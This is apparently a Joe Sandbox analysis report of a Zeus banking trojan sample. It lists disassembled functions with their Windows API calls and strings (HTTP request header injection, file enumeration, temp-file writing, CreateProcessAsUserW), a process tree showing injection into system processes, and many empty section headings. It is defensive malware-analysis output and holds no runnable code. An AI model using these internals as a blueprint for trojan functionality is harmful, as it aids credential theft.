Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004515D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62

APIs

WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00045186

Part of subcall function 00043346: HeapAlloc.KERNEL32(00000008,-00000003,000436F5,?,?,00000000,000441E1,?,00042070,?,?,?,00044191,?,?,?), ref: 00043368
Part of subcall function 00043346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,000436F5,?,?,00000000,000441E1,?,00042070,?,?,?,00044191,?,?), ref: 00043379

InternetReadFile.WININET(?,00001000,00001000,00001000), ref: 000451BD

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Strings

P&Z&d&2&n&<&F&, xrefs: 000451BD

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00039C58, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00039CA8

Part of subcall function 00048AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00048B23
Part of subcall function 00048AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00048B4A
Part of subcall function 00048AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00048B94
Part of subcall function 00048AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00048BC1
Part of subcall function 00048AE4: Sleep.KERNEL32(00000000,?,?), ref: 00048BF1
Part of subcall function 00048AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00048C1F
Part of subcall function 00048AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00048C31

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Strings

#, xrefs: 00039C8C
&, xrefs: 00039C7E

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0003A579, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 0003A5C9

Part of subcall function 00048AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00048B23
Part of subcall function 00048AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00048B4A
Part of subcall function 00048AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00048B94
Part of subcall function 00048AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00048BC1
Part of subcall function 00048AE4: Sleep.KERNEL32(00000000,?,?), ref: 00048BF1
Part of subcall function 00048AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00048C1F
Part of subcall function 00048AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00048C31

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Strings

#, xrefs: 0003A5AD
&, xrefs: 0003A59F

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004A97E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55

APIs

Part of subcall function 0004262D: WaitForSingleObject.KERNEL32(00000000,0003776D), ref: 00042635

HttpAddRequestHeadersW.WININET(?,?,?,A0000000), ref: 0004A9D2

Part of subcall function 0004A6AF: SetLastError.KERNEL32(00002F78), ref: 0004A6F6
Part of subcall function 0004A6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 0004A762
Part of subcall function 0004A6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 0004A77E
Part of subcall function 0004A6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 0004A795
Part of subcall function 0004A6AF: EnterCriticalSection.KERNEL32(00053F24), ref: 0004A79D
Part of subcall function 0004A6AF: LeaveCriticalSection.KERNEL32(00053F24,?), ref: 0004A853
Part of subcall function 0004A6AF: EnterCriticalSection.KERNEL32(00053F24), ref: 0004A87A
Part of subcall function 0004A6AF: LeaveCriticalSection.KERNEL32(00053F24,?), ref: 0004A8BA

HttpSendRequestExW.WININET(?,?,?,?,?), ref: 0004AA0D

Strings

2&n&<&F&, xrefs: 0004AA0D

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004AA1A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55

APIs

Part of subcall function 0004262D: WaitForSingleObject.KERNEL32(00000000,0003776D), ref: 00042635

HttpAddRequestHeadersA.WININET(?,?,?,A0000000), ref: 0004AA6E

Part of subcall function 0004A6AF: SetLastError.KERNEL32(00002F78), ref: 0004A6F6
Part of subcall function 0004A6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 0004A762
Part of subcall function 0004A6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 0004A77E
Part of subcall function 0004A6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 0004A795
Part of subcall function 0004A6AF: EnterCriticalSection.KERNEL32(00053F24), ref: 0004A79D
Part of subcall function 0004A6AF: LeaveCriticalSection.KERNEL32(00053F24,?), ref: 0004A853
Part of subcall function 0004A6AF: EnterCriticalSection.KERNEL32(00053F24), ref: 0004A87A
Part of subcall function 0004A6AF: LeaveCriticalSection.KERNEL32(00053F24,?), ref: 0004A8BA

HttpSendRequestExA.WININET(?,?,?,?,?), ref: 0004AAA9

Strings

<&F&, xrefs: 0004AAA9

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00042B08, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55

APIs

GetModuleHandleW.KERNEL32(?), ref: 00042B1F
GetProcAddress.KERNEL32(00000000,?), ref: 00042B41

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Strings

0x01D9C0A0, xrefs: 00042B63

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00048737, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 0004874E

Part of subcall function 000446F4: GetTickCount.KERNEL32(00048766,?), ref: 000446F4

Part of subcall function 000440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000440CF

Part of subcall function 00048C40: PathCombineW.SHLWAPI(00041F45,00041F45,?), ref: 00048C5F

Part of subcall function 0004856B: CreateFileW.KERNEL32(00044E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00048585
Part of subcall function 0004856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 000485A8
Part of subcall function 0004856B: CloseHandle.KERNEL32(00000000), ref: 000485B5

Strings

tmp, xrefs: 00048767
%s%08x.%s, xrefs: 0004876C

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00046F8F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45

APIs

GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 00046FB1

Part of subcall function 00048716: SetFileAttributesW.KERNEL32(00000080,00000080,0004B4CD,?), ref: 0004871F
Part of subcall function 00048716: DeleteFileW.KERNEL32(?), ref: 00048729

PathFindFileNameW.SHLWAPI(?), ref: 00046FD3

Part of subcall function 0004353A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00044232,00000000,00000000,00000000,00043597,00000000,00000000,00000000,?,00000000), ref: 00043555

Strings

cab, xrefs: 00046FA6

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004C8A1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42

APIs

Part of subcall function 00046AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,000449F4,?,?,?,00042326,000000FF,00052C08), ref: 00046AC3
Part of subcall function 00046AAA: GetLastError.KERNEL32(?,?,000449F4,?,?,?,00042326,000000FF,00052C08,?,?,00000000), ref: 00046AC9
Part of subcall function 00046AAA: GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,00000000,?,?,000449F4,?,?,?,00042326,000000FF,00052C08), ref: 00046AEF

EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,0004C9FB,00000000,?,?,?), ref: 0004C8C6

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Part of subcall function 00044CDD: LoadLibraryA.KERNEL32(userenv.dll), ref: 00044CEE
Part of subcall function 00044CDD: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock,00000000,?), ref: 00044D0D
Part of subcall function 00044CDD: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00044D19
Part of subcall function 00044CDD: CreateProcessAsUserW.ADVAPI32(?,00000000,0004C8F5,00000000,00000000,00000000,0004C8F5,0004C8F5,00000000,?,?,?,00000000,00000044), ref: 00044D8A
Part of subcall function 00044CDD: CloseHandle.KERNEL32(?), ref: 00044D9D
Part of subcall function 00044CDD: CloseHandle.KERNEL32(?), ref: 00044DA2
Part of subcall function 00044CDD: FreeLibrary.KERNEL32(?), ref: 00044DB9

CloseHandle.KERNEL32(?), ref: 0004C907

Strings

"%s", xrefs: 0004C8DA

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00045484, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39

APIs

Part of subcall function 00045403: LoadLibraryA.KERNEL32(urlmon.dll), ref: 00045414
Part of subcall function 00045403: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00045427
Part of subcall function 00045403: FreeLibrary.KERNEL32(?), ref: 00045479

GetTickCount.KERNEL32(?), ref: 000454C9

Part of subcall function 000452D1: WaitForSingleObject.KERNEL32(?,?), ref: 00045325
Part of subcall function 000452D1: Sleep.KERNEL32(?,?,?,00000000), ref: 00045338
Part of subcall function 000452D1: InternetCloseHandle.WININET(00000000), ref: 000453BE

GetTickCount.KERNEL32(00000000), ref: 000454DB

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Strings

http://www.google.com/webhp, xrefs: 000454A9

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0003A2EA, Relevance: 5.2, APIs: 4, Instructions: 197

APIs

Part of subcall function 00048C40: PathCombineW.SHLWAPI(00041F45,00041F45,?), ref: 00048C5F

Part of subcall function 000485D0: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 000485F5
Part of subcall function 000485D0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00042D27,?,?,00000000), ref: 00048608
Part of subcall function 000485D0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,00042D27,?,?,00000000), ref: 00048630
Part of subcall function 000485D0: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00048648
Part of subcall function 000485D0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00042D27,?,?,00000000), ref: 00048662
Part of subcall function 000485D0: CloseHandle.KERNEL32(?), ref: 0004866B

StrStrIA.SHLWAPI(?,?), ref: 0003A410
StrStrIA.SHLWAPI(?,?), ref: 0003A422
StrStrIA.SHLWAPI(?,?), ref: 0003A432
StrStrIA.SHLWAPI(?,?), ref: 0003A444

Part of subcall function 000440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000440CF

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Part of subcall function 00048678: VirtualFree.KERNEL32(?,00000000,00008000,00000000,0004C83B,?,?,.exe,00000000,00000000,?,.exe,00000006), ref: 00048689
Part of subcall function 00048678: CloseHandle.KERNEL32(?), ref: 00048697

Part of subcall function 0004338B: HeapAlloc.KERNEL32(00000008,-00000004,00044B59,00000000,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 0004339C

Part of subcall function 00048AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00048B23
Part of subcall function 00048AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00048B4A
Part of subcall function 00048AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00048B94
Part of subcall function 00048AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00048BC1
Part of subcall function 00048AE4: Sleep.KERNEL32(00000000,?,?), ref: 00048BF1
Part of subcall function 00048AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00048C1F
Part of subcall function 00048AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00048C31

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004AD5F, Relevance: 5.1, APIs: 4, Instructions: 71

APIs

EnterCriticalSection.KERNEL32(00053FB4,?,?,?,0004B052,?), ref: 0004AD7C

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

LeaveCriticalSection.KERNEL32(00053FB4,?,?,?,0004B052,?), ref: 0004AD9D
EnterCriticalSection.KERNEL32(00053FB4,?,?,?,?,0004B052,?), ref: 0004ADAE

Part of subcall function 00043346: HeapAlloc.KERNEL32(00000008,-00000003,000436F5,?,?,00000000,000441E1,?,00042070,?,?,?,00044191,?,?,?), ref: 00043368
Part of subcall function 00043346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,000436F5,?,?,00000000,000441E1,?,00042070,?,?,?,00044191,?,?), ref: 00043379

LeaveCriticalSection.KERNEL32(00053FB4,?,?,?,0004B052,?), ref: 0004AE47

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Loading ...

Warning!

Error!

Analysis Report

Overview

General Information

Detection

Signature Overview

Protection of GUI:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Networking:

Boot Survival:

Remote Access Functionality:

Stealing of Sensitive Information:

Persistence and Installation Behavior:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging and Sandbox Evasion:

Virtual Machine Detection:

Hooking and other Techniques for Hiding and Protection:

Lowering of HIPS / PFW / Operating System Security Settings:

Language, Device and Operating System Detection:

Yara Overview

Screenshot

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Hooks - Code Manipulation Behavior

User Modules

Hook Summary

Processes

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe PID: 3684 Parent PID: 1236

General

Analysis Process: madog.exe PID: 3700 Parent PID: 3684

General

Analysis Process: taskhost.exe PID: 1292 Parent PID: 3700

General

Analysis Process: dwm.exe PID: 2020 Parent PID: 1292

General

Analysis Process: explorer.exe PID: 2032 Parent PID: 3700

General

Analysis Process: conhost.exe PID: 1132 Parent PID: 3700

General

Analysis Process: taskhost.exe PID: 540 Parent PID: 3700

General

Analysis Process: WinSAT.exe PID: 1352 Parent PID: 3700

General

Analysis Process: conhost.exe PID: 2072 Parent PID: 3700

General